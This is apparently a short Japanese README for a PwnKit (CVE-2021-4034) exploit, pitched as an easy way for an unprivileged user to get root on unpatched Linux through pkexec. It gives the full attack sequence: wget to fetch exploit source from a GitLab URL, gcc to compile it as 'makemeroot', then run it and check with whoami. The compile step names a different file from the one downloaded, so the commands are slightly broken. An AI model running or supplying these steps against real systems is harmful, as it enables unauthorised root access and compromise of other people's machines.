
CVE-2021-4034(PWNKIT)のローカル権限昇格エクスプロイトで、Polkitのpkexecを標的とし、権限のないユーザーが脆弱なLinuxシステム上でroot権限を取得できるようにします。
CVE-2021-4034 (PWNKIT)
Polkit の pkexec におけるメモリ破壊の脆弱性。デフォルトの polkit 設定を使用している脆弱なシステム上で、権限のない任意のユーザーが完全な root 権限を取得できる可能性があります。
簡単に使用でき、パッチが適用されていない Linux システムでローカル権限昇格が可能です。
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami